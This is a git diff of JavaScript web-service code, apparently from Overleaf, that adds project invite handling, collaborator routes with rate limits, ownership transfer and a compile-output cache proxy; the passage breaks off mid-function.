'cannot_invite_non_user', + }) + } + + const invite = await CollaboratorsInviteHandler.promises.inviteToProject( + projectId, + sendingUser, + email, + privileges + ) + + ProjectAuditLogHandler.addEntryInBackground( + projectId, + 'send-invite', + sendingUserId, + req.ip, + { + inviteId: invite._id, + privileges, + } + ) + + logger.debug({ projectId, email, sendingUserId }, 'invite created') + + EditorRealTimeController.emitToRoom(projectId, 'project:membership:changed', { + invites: true, + }) + res.json({ invite }) +} +async function revokeInvite(req, res) { + const projectId = req.params.Project_id + const inviteId = req.params.invite_id + const user = SessionManager.getSessionUser(req.session) + + logger.debug({ projectId, inviteId }, 'revoking invite') + + const invite = await CollaboratorsInviteHandler.promises.revokeInvite( + projectId, + inviteId + ) + + if (invite != null) { + ProjectAuditLogHandler.addEntryInBackground( + projectId, + 'revoke-invite', + user._id, + req.ip, + { + inviteId: invite._id, + privileges: invite.privileges, + } + ) + EditorRealTimeController.emitToRoom( + projectId, + 'project:membership:changed', + { invites: true } + ) + } + + res.sendStatus(204) +} + +async function generateNewInvite(req, res) { + const projectId = req.params.Project_id + const inviteId = req.params.invite_id + const user = SessionManager.getSessionUser(req.session) + + logger.debug({ projectId, inviteId }, 'resending invite') + const sendingUser = SessionManager.getSessionUser(req.session) + const underRateLimit = await CollaboratorsInviteController._checkRateLimit( + sendingUser._id + ) + if (!underRateLimit) { + return res.sendStatus(429) + } + + const invite = await CollaboratorsInviteHandler.promises.generateNewInvite( + projectId, + sendingUser, + inviteId + ) + + EditorRealTimeController.emitToRoom(projectId, 'project:membership:changed', { + invites: true, + }) + + if (invite != null) { + ProjectAuditLogHandler.addEntryInBackground( + projectId, + 'resend-invite', + user._id, + req.ip, + { + inviteId: invite._id, + privileges: invite.privileges, + } + ) + + res.sendStatus(201) + } else { + res.sendStatus(404) + } +} + +async function viewInvite(req, res) { + const projectId = req.params.Project_id + const { token } = req.params + const _renderInvalidPage = function () { + res.status(404) + logger.debug({ projectId }, 'invite not valid, rendering not-valid page') + 
res.render('project/invite/not-valid', { title: 'Invalid Invite' }) + } + + // check if the user is already a member of the project + const currentUser = SessionManager.getSessionUser(req.session) + if (currentUser) { + const isMember = + await CollaboratorsGetter.promises.isUserInvitedMemberOfProject( + currentUser._id, + projectId + ) + if (isMember) { + logger.debug( + { projectId, userId: currentUser._id }, + 'user is already a member of this project, redirecting' + ) + return res.redirect(`/project/${projectId}`) + } + } + + // get the invite + const invite = await CollaboratorsInviteGetter.promises.getInviteByToken( + projectId, + token + ) + + // check if invite is gone, or otherwise non-existent + if (invite == null) { + logger.debug({ projectId }, 'no invite found for this token') + return _renderInvalidPage() + } + + // check the user who sent the invite exists + const owner = await UserGetter.promises.getUser( + { _id: invite.sendingUserId }, + { email: 1, first_name: 1, last_name: 1 } + ) + if (owner == null) { + logger.debug({ projectId }, 'no project owner found') + return _renderInvalidPage() + } + + // fetch the project name + const project = await ProjectGetter.promises.getProject(projectId, { + name: 1, + }) + if (project == null) { + logger.debug({ projectId }, 'no project found') + return _renderInvalidPage() + } + + if (!currentUser) { + req.session.sharedProjectData = { + project_name: project.name, + user_first_name: owner.first_name, + } + AuthenticationController.setRedirectInSession(req) + return res.redirect('/register') + } + + // cleanup if set for register page + delete req.session.sharedProjectData + + // finally render the invite + res.render('project/invite/show', { + invite, + token, + project, + owner, + title: 'Project Invite', + }) +} + +async function acceptInvite(req, res) { + const { Project_id: projectId, token } = req.params + const currentUser = SessionManager.getSessionUser(req.session) + logger.debug( + { projectId, userId: currentUser._id }, + 'got request to accept invite' + ) + + const invite = await CollaboratorsInviteGetter.promises.getInviteByToken( + projectId, + token + ) + + if (invite == null) { + throw new Errors.NotFoundError('no matching invite found') + } + + await ProjectAuditLogHandler.promises.addEntry( + projectId, + 'accept-invite', + currentUser._id, + req.ip, + { + inviteId: invite._id, + privileges: invite.privileges, + } + ) + + await CollaboratorsInviteHandler.promises.acceptInvite( + invite, + projectId, + currentUser + ) + + await EditorRealTimeController.emitToRoom( + projectId, + 'project:membership:changed', + { invites: true, members: true } + ) + + let editMode = 'edit' + if (invite.privileges === PrivilegeLevels.REVIEW) { + editMode = 'review' + } else if (invite.privileges === PrivilegeLevels.READ_ONLY) { + editMode = 'view' + } + AnalyticsManager.recordEventForUserInBackground( + currentUser._id, + 'project-joined', + { + projectId, + ownerId: invite.sendingUserId, // only owner can invite others + mode: editMode, + role: invite.privileges, + source: 'email-invite', + } + ) + + if (req.xhr) { + res.sendStatus(204) // Done async via project page notification + } else { + res.redirect(`/project/${projectId}`) + } +} + +const CollaboratorsInviteController = { + getAllInvites: expressify(getAllInvites), + inviteToProject: expressify(inviteToProject), + revokeInvite: expressify(revokeInvite), + generateNewInvite: expressify(generateNewInvite), + viewInvite: expressify(viewInvite), + acceptInvite: 
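+/*
+ * Sketch of the privilege-to-mode mapping inside acceptInvite above, written
+ * as a hypothetical helper for clarity (not part of this controller):
+ *
+ *   function editModeFor(privileges) {
+ *     if (privileges === PrivilegeLevels.REVIEW) return 'review'
+ *     if (privileges === PrivilegeLevels.READ_ONLY) return 'view'
+ *     return 'edit' // READ_AND_WRITE
+ *   }
+ */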
expressify(acceptInvite), + _checkShouldInviteEmail, + _checkRateLimit, +} + +export default CollaboratorsInviteController diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsInviteGetter.js b/services/web/app/src/Features/Collaborators/CollaboratorsInviteGetter.js new file mode 100644 index 0000000..e3f692e --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsInviteGetter.js @@ -0,0 +1,48 @@ +const logger = require('@overleaf/logger') +const { ProjectInvite } = require('../../models/ProjectInvite') +const PrivilegeLevels = require('../Authorization/PrivilegeLevels') +const CollaboratorsInviteHelper = require('./CollaboratorsInviteHelper') + +async function getAllInvites(projectId) { + logger.debug({ projectId }, 'fetching invites for project') + const invites = await ProjectInvite.find({ projectId }) + .select('_id email privileges') + .exec() + logger.debug( + { projectId, count: invites.length }, + 'found invites for project' + ) + return invites +} + +async function getEditInviteCount(projectId) { + logger.debug({ projectId }, 'counting edit invites for project') + const count = await ProjectInvite.countDocuments({ + projectId, + privileges: { $ne: PrivilegeLevels.READ_ONLY }, + }).exec() + return count +} + +async function getInviteByToken(projectId, tokenString) { + logger.debug({ projectId }, 'fetching invite by token') + const invite = await ProjectInvite.findOne({ + projectId, + tokenHmac: CollaboratorsInviteHelper.hashInviteToken(tokenString), + }).exec() + + if (invite == null) { + logger.err({ projectId }, 'no invite found') + return null + } + + return invite +} + +module.exports = { + promises: { + getAllInvites, + getEditInviteCount, + getInviteByToken, + }, +} diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsInviteHandler.mjs b/services/web/app/src/Features/Collaborators/CollaboratorsInviteHandler.mjs new file mode 100644 index 0000000..02db4de --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsInviteHandler.mjs @@ -0,0 +1,234 @@ +import { callbackify } from 'node:util' +import { ProjectInvite } from '../../models/ProjectInvite.js' +import logger from '@overleaf/logger' +import CollaboratorsEmailHandler from './CollaboratorsEmailHandler.mjs' +import CollaboratorsHandler from './CollaboratorsHandler.js' +import CollaboratorsInviteGetter from './CollaboratorsInviteGetter.js' +import CollaboratorsInviteHelper from './CollaboratorsInviteHelper.js' +import UserGetter from '../User/UserGetter.js' +import ProjectGetter from '../Project/ProjectGetter.js' +import NotificationsBuilder from '../Notifications/NotificationsBuilder.js' +import PrivilegeLevels from '../Authorization/PrivilegeLevels.js' +import LimitationsManager from '../Subscription/LimitationsManager.js' +import ProjectAuditLogHandler from '../Project/ProjectAuditLogHandler.js' +import _ from 'lodash' + +const CollaboratorsInviteHandler = { + async _trySendInviteNotification(projectId, sendingUser, invite) { + const { email } = invite + const existingUser = await UserGetter.promises.getUserByAnyEmail(email, { + _id: 1, + }) + if (existingUser == null) { + logger.debug({ projectId, email }, 'no existing user found, returning') + return null + } + const project = await ProjectGetter.promises.getProject(projectId, { + _id: 1, + name: 1, + }) + if (project == null) { + logger.debug( + { projectId }, + 'no project found while sending notification, returning' + ) + return null + } + await NotificationsBuilder.promises + 
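+/*
+ * Sketch of the lookup performed by getInviteByToken above: only the HMAC of
+ * an invite token is stored, so the presented token is re-hashed and matched
+ * against tokenHmac. A minimal equivalent of the query:
+ *
+ *   const tokenHmac = CollaboratorsInviteHelper.hashInviteToken(tokenString)
+ *   const invite = await ProjectInvite.findOne({ projectId, tokenHmac }).exec()
+ */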
.projectInvite(invite, project, sendingUser, existingUser) + .create() + }, + + async _tryCancelInviteNotification(inviteId) { + return await NotificationsBuilder.promises + .projectInvite({ _id: inviteId }, null, null, null) + .read() + }, + + async _sendMessages(projectId, sendingUser, invite) { + const { email } = invite + logger.debug( + { projectId, email, inviteId: invite._id }, + 'sending notification and email for invite' + ) + const notificationJob = + CollaboratorsInviteHandler._trySendInviteNotification( + projectId, + sendingUser, + invite + ).catch(err => { + logger.err( + { err, projectId, email }, + 'error sending notification for invite' + ) + }) + CollaboratorsEmailHandler.promises + .notifyUserOfProjectInvite(projectId, invite.email, invite, sendingUser) + .catch(err => { + logger.err({ err, projectId, email }, 'error sending email for invite') + }) + await notificationJob + }, + + async inviteToProject(projectId, sendingUser, email, privileges) { + logger.debug( + { projectId, sendingUserId: sendingUser._id, email, privileges }, + 'adding invite' + ) + const token = CollaboratorsInviteHelper.generateToken() + const tokenHmac = CollaboratorsInviteHelper.hashInviteToken(token) + let invite = new ProjectInvite({ + email, + tokenHmac, + sendingUserId: sendingUser._id, + projectId, + privileges, + }) + invite = await invite.save() + invite = invite.toObject() + + // Send notification and email + await CollaboratorsInviteHandler._sendMessages(projectId, sendingUser, { + ...invite, + token, + }) + + return _.pick(invite, ['_id', 'email', 'privileges']) + }, + + async revokeInviteForUser(projectId, targetEmails) { + logger.debug({ projectId }, 'getting all active invites for project') + const invites = + await CollaboratorsInviteGetter.promises.getAllInvites(projectId) + const matchingInvite = invites.find(invite => + targetEmails.some(emailData => emailData.email === invite.email) + ) + if (matchingInvite) { + await CollaboratorsInviteHandler.revokeInvite( + projectId, + matchingInvite._id + ) + } + }, + + async revokeInvite(projectId, inviteId) { + logger.debug({ projectId, inviteId }, 'removing invite') + const invite = await ProjectInvite.findOneAndDelete({ + projectId, + _id: inviteId, + }).exec() + CollaboratorsInviteHandler._tryCancelInviteNotification(inviteId).catch( + err => { + logger.err( + { err, projectId, inviteId }, + 'failed to cancel invite notification' + ) + } + ) + return invite + }, + + async generateNewInvite(projectId, sendingUser, inviteId) { + logger.debug({ projectId, inviteId }, 'generating new invite email') + const invite = await this.revokeInvite(projectId, inviteId) + + if (invite == null) { + logger.warn( + { projectId, inviteId }, + 'no invite found, nothing to generate' + ) + return null + } + + return await this.inviteToProject( + projectId, + sendingUser, + invite.email, + invite.privileges + ) + }, + + async acceptInvite(invite, projectId, user) { + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: 1, + }) + + let privilegeLevel = invite.privileges + const opts = {} + if ( + [PrivilegeLevels.READ_AND_WRITE, PrivilegeLevels.REVIEW].includes( + invite.privileges + ) + ) { + const allowed = + await LimitationsManager.promises.canAcceptEditCollaboratorInvite( + project._id + ) + if (!allowed) { + privilegeLevel = PrivilegeLevels.READ_ONLY + if (invite.privileges === PrivilegeLevels.READ_AND_WRITE) { + opts.pendingEditor = true + } else if (invite.privileges === PrivilegeLevels.REVIEW) { + opts.pendingReviewer = 
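+/*
+ * The _sendMessages pattern above starts the notification and email jobs
+ * concurrently, attaches .catch handlers so neither can surface as an
+ * unhandled rejection, and only awaits the notification. A minimal sketch of
+ * the same pattern with hypothetical job names:
+ *
+ *   const notificationJob = sendNotification().catch(err =>
+ *     logger.err({ err }, 'error sending notification')
+ *   )
+ *   sendEmail().catch(err => logger.err({ err }, 'error sending email'))
+ *   await notificationJob // the email job is deliberately not awaited
+ */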
true + } + + logger.debug( + { projectId, userId: user._id, privileges: invite.privileges }, + 'no collaborator slots available, user added as read only (pending editor)' + ) + await ProjectAuditLogHandler.promises.addEntry( + projectId, + 'editor-moved-to-pending', // controller already logged accept-invite + null, + null, + { + userId: user._id.toString(), + role: + invite.privileges === PrivilegeLevels.REVIEW + ? 'reviewer' + : 'editor', + } + ) + } + } + + await CollaboratorsHandler.promises.addUserIdToProject( + projectId, + invite.sendingUserId, + user._id, + privilegeLevel, + opts + ) + + // Remove invite + const inviteId = invite._id + logger.debug({ projectId, inviteId }, 'removing invite') + await ProjectInvite.deleteOne({ _id: inviteId }).exec() + CollaboratorsInviteHandler._tryCancelInviteNotification(inviteId).catch( + err => { + logger.error( + { err, projectId, inviteId }, + 'failed to cancel invite notification' + ) + } + ) + }, +} + +export default { + promises: CollaboratorsInviteHandler, + inviteToProject: callbackify(CollaboratorsInviteHandler.inviteToProject), + revokeInviteForUser: callbackify( + CollaboratorsInviteHandler.revokeInviteForUser + ), + revokeInvite: callbackify(CollaboratorsInviteHandler.revokeInvite), + generateNewInvite: callbackify(CollaboratorsInviteHandler.generateNewInvite), + acceptInvite: callbackify(CollaboratorsInviteHandler.acceptInvite), + _trySendInviteNotification: callbackify( + CollaboratorsInviteHandler._trySendInviteNotification + ), + _tryCancelInviteNotification: callbackify( + CollaboratorsInviteHandler._tryCancelInviteNotification + ), + _sendMessages: callbackify(CollaboratorsInviteHandler._sendMessages), +} diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsInviteHelper.js b/services/web/app/src/Features/Collaborators/CollaboratorsInviteHelper.js new file mode 100644 index 0000000..305f93e --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsInviteHelper.js @@ -0,0 +1,17 @@ +const Crypto = require('crypto') + +function generateToken() { + const buffer = Crypto.randomBytes(24) + return buffer.toString('hex') +} + +function hashInviteToken(token) { + return Crypto.createHmac('sha256', 'overleaf-token-invite') + .update(token) + .digest('hex') +} + +module.exports = { + generateToken, + hashInviteToken, +} diff --git a/services/web/app/src/Features/Collaborators/CollaboratorsRouter.mjs b/services/web/app/src/Features/Collaborators/CollaboratorsRouter.mjs new file mode 100644 index 0000000..63a88c1 --- /dev/null +++ b/services/web/app/src/Features/Collaborators/CollaboratorsRouter.mjs @@ -0,0 +1,175 @@ +import CollaboratorsController from './CollaboratorsController.mjs' +import AuthenticationController from '../Authentication/AuthenticationController.js' +import AuthorizationMiddleware from '../Authorization/AuthorizationMiddleware.js' +import PrivilegeLevels from '../Authorization/PrivilegeLevels.js' +import CollaboratorsInviteController from './CollaboratorsInviteController.mjs' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' +import CaptchaMiddleware from '../Captcha/CaptchaMiddleware.js' +import AnalyticsRegistrationSourceMiddleware from '../Analytics/AnalyticsRegistrationSourceMiddleware.js' +import { Joi, validate } from '../../infrastructure/Validation.js' + +const rateLimiters = { + inviteToProjectByProjectId: new RateLimiter( + 'invite-to-project-by-project-id', + { points: 100, duration: 60 
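+/*
+ * Usage sketch for CollaboratorsInviteHelper above: a 24-byte random token is
+ * shown to the invitee exactly once, while only its HMAC is persisted, so a
+ * database leak does not yield usable invite links. Hypothetical round trip:
+ *
+ *   const token = CollaboratorsInviteHelper.generateToken() // 48 hex chars
+ *   const tokenHmac = CollaboratorsInviteHelper.hashInviteToken(token)
+ *   // store tokenHmac; later, an invite URL is valid iff
+ *   // hashInviteToken(presentedToken) === tokenHmac
+ */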
* 10 } + ), + inviteToProjectByIp: new RateLimiter('invite-to-project-by-ip', { + points: 100, + duration: 60 * 10, + }), + resendInvite: new RateLimiter('resend-invite', { + points: 200, + duration: 60 * 10, + }), + getProjectTokens: new RateLimiter('get-project-tokens', { + points: 200, + duration: 60 * 10, + }), + viewProjectInvite: new RateLimiter('view-project-invite', { + points: 20, + duration: 60, + }), +} + +export default { + apply(webRouter) { + webRouter.post( + '/project/:Project_id/leave', + AuthenticationController.requireLogin(), + CollaboratorsController.removeSelfFromProject + ) + + webRouter.put( + '/project/:Project_id/users/:user_id', + AuthenticationController.requireLogin(), + validate({ + params: Joi.object({ + Project_id: Joi.objectId(), + user_id: Joi.objectId(), + }), + body: Joi.object({ + privilegeLevel: Joi.string() + .valid( + PrivilegeLevels.READ_ONLY, + PrivilegeLevels.READ_AND_WRITE, + PrivilegeLevels.REVIEW + ) + .required(), + }), + }), + AuthorizationMiddleware.ensureUserCanAdminProject, + CollaboratorsController.setCollaboratorInfo + ) + + webRouter.delete( + '/project/:Project_id/users/:user_id', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanAdminProject, + CollaboratorsController.removeUserFromProject + ) + + webRouter.get( + '/project/:Project_id/members', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.blockRestrictedUserFromProject, + AuthorizationMiddleware.ensureUserCanReadProject, + CollaboratorsController.getAllMembers + ) + + webRouter.post( + '/project/:Project_id/transfer-ownership', + AuthenticationController.requireLogin(), + validate({ + params: Joi.object({ + Project_id: Joi.objectId(), + }), + body: Joi.object({ + user_id: Joi.objectId(), + }), + }), + AuthorizationMiddleware.ensureUserCanAdminProject, + CollaboratorsController.transferOwnership + ) + + // invites + webRouter.post( + '/project/:Project_id/invite', + RateLimiterMiddleware.rateLimit(rateLimiters.inviteToProjectByProjectId, { + params: ['Project_id'], + }), + RateLimiterMiddleware.rateLimit(rateLimiters.inviteToProjectByIp, { + ipOnly: true, + }), + CaptchaMiddleware.validateCaptcha('invite'), + AuthenticationController.requireLogin(), + validate({ + body: Joi.object({ + email: Joi.string().required(), + privileges: Joi.string() + .valid( + PrivilegeLevels.READ_ONLY, + PrivilegeLevels.READ_AND_WRITE, + PrivilegeLevels.REVIEW + ) + .required(), + }), + }), + AuthorizationMiddleware.ensureUserCanAdminProject, + CollaboratorsInviteController.inviteToProject + ) + + webRouter.get( + '/project/:Project_id/invites', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanAdminProject, + CollaboratorsInviteController.getAllInvites + ) + + webRouter.delete( + '/project/:Project_id/invite/:invite_id', + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanAdminProject, + CollaboratorsInviteController.revokeInvite + ) + + webRouter.post( + '/project/:Project_id/invite/:invite_id/resend', + RateLimiterMiddleware.rateLimit(rateLimiters.resendInvite, { + params: ['Project_id'], + }), + AuthenticationController.requireLogin(), + AuthorizationMiddleware.ensureUserCanAdminProject, + CollaboratorsInviteController.generateNewInvite + ) + + webRouter.get( + '/project/:Project_id/invite/token/:token', + AnalyticsRegistrationSourceMiddleware.setSource( + 'collaboration', + 'project-invite' + ), + RateLimiterMiddleware.rateLimit(rateLimiters.viewProjectInvite), + 
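+/*
+ * Note on middleware order for the POST /project/:Project_id/invite route
+ * above: rate limits run first (per project id, then per IP), then the
+ * captcha check, then authentication, then body validation, and only then
+ * project-admin authorization -- cheap rejections happen before any database
+ * work. Hypothetical trace of one accepted request:
+ *
+ *   rateLimit(projectId) -> rateLimit(ip) -> validateCaptcha('invite')
+ *     -> requireLogin() -> validate(body) -> ensureUserCanAdminProject
+ *     -> inviteToProject
+ */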
CollaboratorsInviteController.viewInvite, + AnalyticsRegistrationSourceMiddleware.clearSource() + ) + + webRouter.post( + '/project/:Project_id/invite/token/:token/accept', + AnalyticsRegistrationSourceMiddleware.setSource( + 'collaboration', + 'project-invite' + ), + AuthenticationController.requireLogin(), + CollaboratorsInviteController.acceptInvite, + AnalyticsRegistrationSourceMiddleware.clearSource() + ) + + webRouter.get( + '/project/:Project_id/tokens', + RateLimiterMiddleware.rateLimit(rateLimiters.getProjectTokens), + AuthorizationMiddleware.ensureUserCanReadProject, + CollaboratorsController.getShareTokens + ) + }, +} diff --git a/services/web/app/src/Features/Collaborators/OwnershipTransferHandler.js b/services/web/app/src/Features/Collaborators/OwnershipTransferHandler.js new file mode 100644 index 0000000..82c9c37 --- /dev/null +++ b/services/web/app/src/Features/Collaborators/OwnershipTransferHandler.js @@ -0,0 +1,168 @@ +const logger = require('@overleaf/logger') +const { Project } = require('../../models/Project') +const ProjectGetter = require('../Project/ProjectGetter') +const UserGetter = require('../User/UserGetter') +const CollaboratorsHandler = require('./CollaboratorsHandler') +const EmailHandler = require('../Email/EmailHandler') +const Errors = require('../Errors/Errors') +const PrivilegeLevels = require('../Authorization/PrivilegeLevels') +const TpdsProjectFlusher = require('../ThirdPartyDataStore/TpdsProjectFlusher') +const ProjectAuditLogHandler = require('../Project/ProjectAuditLogHandler') +const AnalyticsManager = require('../Analytics/AnalyticsManager') + +module.exports = { + promises: { transferOwnership }, +} + +async function transferOwnership(projectId, newOwnerId, options = {}) { + const { + allowTransferToNonCollaborators, + sessionUserId, + skipEmails, + ipAddress, + } = options + + // Fetch project and user + const [project, newOwner] = await Promise.all([ + _getProject(projectId), + _getUser(newOwnerId), + ]) + + // Exit early if the transferee is already the project owner + const previousOwnerId = project.owner_ref + if (previousOwnerId.equals(newOwnerId)) { + return + } + + // Check that user is already a collaborator + if ( + !allowTransferToNonCollaborators && + !_userIsCollaborator(newOwner, project) + ) { + throw new Errors.UserNotCollaboratorError({ info: { userId: newOwnerId } }) + } + + // Track the change of ownership in BigQuery. 
+ AnalyticsManager.recordEventForUserInBackground( + previousOwnerId, + 'project-ownership-transfer', + { projectId, newOwnerId } + ) + + // Transfer ownership + await ProjectAuditLogHandler.promises.addEntry( + projectId, + 'transfer-ownership', + sessionUserId, + ipAddress, + { previousOwnerId, newOwnerId } + ) + + // Determine which permissions to give old owner based on + // new owner's existing permissions + const newPermissions = + _getUserPermissions(newOwner, project) || PrivilegeLevels.READ_ONLY + + await _transferOwnership( + projectId, + previousOwnerId, + newOwnerId, + newPermissions + ) + + // Flush project to TPDS + await TpdsProjectFlusher.promises.flushProjectToTpds(projectId) + + // Send confirmation emails + const previousOwner = await UserGetter.promises.getUser(previousOwnerId) + if (!skipEmails) { + await _sendEmails(project, previousOwner, newOwner) + } +} + +async function _getProject(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: 1, + collaberator_refs: 1, + readOnly_refs: 1, + name: 1, + }) + if (project == null) { + throw new Errors.ProjectNotFoundError({ info: { projectId } }) + } + return project +} + +async function _getUser(userId) { + const user = await UserGetter.promises.getUser(userId) + if (user == null) { + throw new Errors.UserNotFoundError({ info: { userId } }) + } + return user +} + +function _getUserPermissions(user, project) { + const collaboratorIds = project.collaberator_refs || [] + const readOnlyIds = project.readOnly_refs || [] + if (collaboratorIds.some(collaboratorId => collaboratorId.equals(user._id))) { + return PrivilegeLevels.READ_AND_WRITE + } else if ( + readOnlyIds.some(collaboratorId => collaboratorId.equals(user._id)) + ) { + return PrivilegeLevels.READ_ONLY + } +} + +function _userIsCollaborator(user, project) { + return Boolean(_getUserPermissions(user, project)) +} + +async function _transferOwnership( + projectId, + previousOwnerId, + newOwnerId, + newPermissions +) { + await CollaboratorsHandler.promises.removeUserFromProject( + projectId, + newOwnerId + ) + await Project.updateOne( + { _id: projectId }, + { $set: { owner_ref: newOwnerId } } + ).exec() + await CollaboratorsHandler.promises.addUserIdToProject( + projectId, + newOwnerId, + previousOwnerId, + newPermissions + ) +} + +async function _sendEmails(project, previousOwner, newOwner) { + if (previousOwner == null) { + // The previous owner didn't exist. 
This is not supposed to happen, but + // since we're changing the owner anyway, we'll just warn + logger.warn( + { projectId: project._id, ownerId: newOwner._id }, + 'Project owner did not exist before ownership transfer' + ) + } else { + // Send confirmation emails + await Promise.all([ + EmailHandler.promises.sendEmail( + 'ownershipTransferConfirmationPreviousOwner', + { + to: previousOwner.email, + project, + newOwner, + } + ), + EmailHandler.promises.sendEmail('ownershipTransferConfirmationNewOwner', { + to: newOwner.email, + project, + previousOwner, + }), + ]) + } +} diff --git a/services/web/app/src/Features/Compile/ClsiCacheController.js b/services/web/app/src/Features/Compile/ClsiCacheController.js new file mode 100644 index 0000000..9795fd3 --- /dev/null +++ b/services/web/app/src/Features/Compile/ClsiCacheController.js @@ -0,0 +1,193 @@ +const { NotFoundError } = require('../Errors/Errors') +const { + fetchStreamWithResponse, + RequestFailedError, + fetchJson, +} = require('@overleaf/fetch-utils') +const Path = require('path') +const { pipeline } = require('stream/promises') +const logger = require('@overleaf/logger') +const ClsiCacheManager = require('./ClsiCacheManager') +const CompileController = require('./CompileController') +const { expressify } = require('@overleaf/promise-utils') +const ClsiCacheHandler = require('./ClsiCacheHandler') +const ProjectGetter = require('../Project/ProjectGetter') + +/** + * Download a file from a specific build on the clsi-cache. + * + * @param req + * @param res + * @return {Promise<*>} + */ +async function downloadFromCache(req, res) { + const { Project_id: projectId, buildId, filename } = req.params + const userId = CompileController._getUserIdForCompile(req) + const signal = AbortSignal.timeout(60 * 1000) + let location, projectName + try { + ;[{ location }, { name: projectName }] = await Promise.all([ + ClsiCacheHandler.getOutputFile( + projectId, + userId, + buildId, + filename, + signal + ), + ProjectGetter.promises.getProject(projectId, { name: 1 }), + ]) + } catch (err) { + if (err instanceof NotFoundError) { + // res.sendStatus() sends a description of the status as body. + // Using res.status().end() avoids sending that fake body. + return res.status(404).end() + } else { + throw err + } + } + + const { stream, response } = await fetchStreamWithResponse(location, { + signal, + }) + if (req.destroyed) { + // The client has disconnected already, avoid trying to write into the broken connection. + return + } + + for (const key of ['Content-Length', 'Content-Type']) { + if (response.headers.has(key)) res.setHeader(key, response.headers.get(key)) + } + const ext = Path.extname(filename) + res.attachment( + ext === '.pdf' + ? `${CompileController._getSafeProjectName({ name: projectName })}.pdf` + : filename + ) + try { + res.writeHead(response.status) + await pipeline(stream, res) + } catch (err) { + const reqAborted = Boolean(req.destroyed) + const streamingStarted = Boolean(res.headersSent) + if (!streamingStarted) { + if (err instanceof RequestFailedError) { + res.sendStatus(err.response.status) + } else { + res.sendStatus(500) + } + } + if ( + streamingStarted && + reqAborted && + err.code === 'ERR_STREAM_PREMATURE_CLOSE' + ) { + // Ignore noisy spurious error + return + } + logger.warn( + { + err, + projectId, + location, + filename, + reqAborted, + streamingStarted, + }, + 'CLSI-cache proxy error' + ) + } +} + +/** + * Prepare a compile response from the clsi-cache. 
+ * + * @param req + * @param res + * @return {Promise<void>} + */ +async function getLatestBuildFromCache(req, res) { + const { Project_id: projectId } = req.params + const userId = CompileController._getUserIdForCompile(req) + try { + const { + internal: { location: metaLocation, zone }, + external: { isUpToDate, allFiles }, + } = await ClsiCacheManager.getLatestBuildFromCache( + projectId, + userId, + 'output.overleaf.json' + ) + + if (!isUpToDate) return res.sendStatus(410) + + const meta = await fetchJson(metaLocation, { + signal: AbortSignal.timeout(5 * 1000), + }) + + const [, editorId, buildId] = metaLocation.match( + /\/build\/([a-f0-9-]+?)-([a-f0-9]+-[a-f0-9]+)\// + ) + + let baseURL = `/project/${projectId}` + if (userId) { + baseURL += `/user/${userId}` + } + + const { ranges, contentId, clsiServerId, compileGroup, size, options } = + meta + + const outputFiles = allFiles + .filter( + path => path !== 'output.overleaf.json' && path !== 'output.tar.gz' + ) + .map(path => { + const f = { + url: `${baseURL}/build/${editorId}-${buildId}/output/${path}`, + downloadURL: `/download/project/${projectId}/build/${editorId}-${buildId}/output/cached/${path}`, + build: buildId, + path, + type: path.split('.').pop(), + } + if (path === 'output.pdf') { + Object.assign(f, { + size, + editorId, + }) + if (clsiServerId !== 'cache') { + // Enable PDF caching and attempt to download from VM first. + // (clsi VMs do not have the editorId in the path on disk, omit it). + Object.assign(f, { + url: `${baseURL}/build/${buildId}/output/output.pdf`, + ranges, + contentId, + }) + } + } + return f + }) + let { pdfCachingMinChunkSize, pdfDownloadDomain } = + await CompileController._getSplitTestOptions(req, res) + pdfDownloadDomain += `/zone/${zone}` + res.json({ + fromCache: true, + status: 'success', + outputFiles, + compileGroup, + clsiServerId, + pdfDownloadDomain, + pdfCachingMinChunkSize, + options, + }) + } catch (err) { + if (err instanceof NotFoundError) { + res.sendStatus(404) + } else { + throw err + } + } +} + +module.exports = { + downloadFromCache: expressify(downloadFromCache), + getLatestBuildFromCache: expressify(getLatestBuildFromCache), +} diff --git a/services/web/app/src/Features/Compile/ClsiCacheHandler.js b/services/web/app/src/Features/Compile/ClsiCacheHandler.js new file mode 100644 index 0000000..14c742d --- /dev/null +++ b/services/web/app/src/Features/Compile/ClsiCacheHandler.js @@ -0,0 +1,217 @@ +const _ = require('lodash') +const { + fetchNothing, + fetchRedirectWithResponse, + RequestFailedError, +} = require('@overleaf/fetch-utils') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const OError = require('@overleaf/o-error') +const { NotFoundError, InvalidNameError } = require('../Errors/Errors') + +function validateFilename(filename) { + if ( + ![ + 'output.blg', + 'output.log', + 'output.pdf', + 'output.synctex.gz', + 'output.overleaf.json', + 'output.tar.gz', + ].includes(filename) && + !filename.endsWith('.blg') + ) { + throw new InvalidNameError('bad filename') + } +} + +/** + * Clear the cache on all clsi-cache instances. 
+ * + * @param projectId + * @param userId + * @return {Promise<void>} + */ +async function clearCache(projectId, userId) { + let path = `/project/${projectId}` + if (userId) { + path += `/user/${userId}` + } + path += '/output' + + await Promise.all( + Settings.apis.clsiCache.instances.map(async ({ url, zone }) => { + const u = new URL(url) + u.pathname = path + try { + await fetchNothing(u, { + method: 'DELETE', + signal: AbortSignal.timeout(15_000), + }) + } catch (err) { + throw OError.tag(err, 'clear clsi-cache', { url, zone }) + } + }) + ) +} + +/** + * Get an output file from a specific build. + * + * @param projectId + * @param userId + * @param buildId + * @param filename + * @param signal + * @return {Promise<{size: number, zone: string, location: string, lastModified: Date, allFiles: string[]}>} + */ +async function getOutputFile( + projectId, + userId, + buildId, + filename, + signal = AbortSignal.timeout(15_000) +) { + validateFilename(filename) + if (!/^[a-f0-9-]+$/.test(buildId)) { + throw new InvalidNameError('bad buildId') + } + + let path = `/project/${projectId}` + if (userId) { + path += `/user/${userId}` + } + path += 